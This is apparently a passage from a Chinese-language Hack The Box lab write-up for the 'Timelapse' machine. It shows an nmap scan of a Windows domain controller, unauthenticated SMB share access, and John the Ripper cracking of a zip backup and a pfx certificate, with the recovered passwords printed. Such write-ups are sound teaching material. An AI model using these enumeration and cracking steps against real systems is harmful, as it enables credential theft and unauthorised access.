$ nmap -sC -sV -Pn 10.10.11.152 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 13:32 CST Nmap scan report for 10.10.11.152 Host is up (0.19s latency). Not shown: 991 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-07 13:34:30Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 163.96 seconds
SMB
smb未授权访问,有个shares:
Shares
两个目录,dev里是winrm backup,HelpDesk里是LAPS相关文件:
winrm_backup.zip
压缩包有密码,可以破解出来:
1 2 3
zip2john winrm_backup.zip > hash.txt sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt supremelegacy
解压出来一个pfx证书文件,同样需要密码,john破解:
1 2 3
pfx2john legacyy_dev_auth.pfx > hash2.txt sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt thuglegacy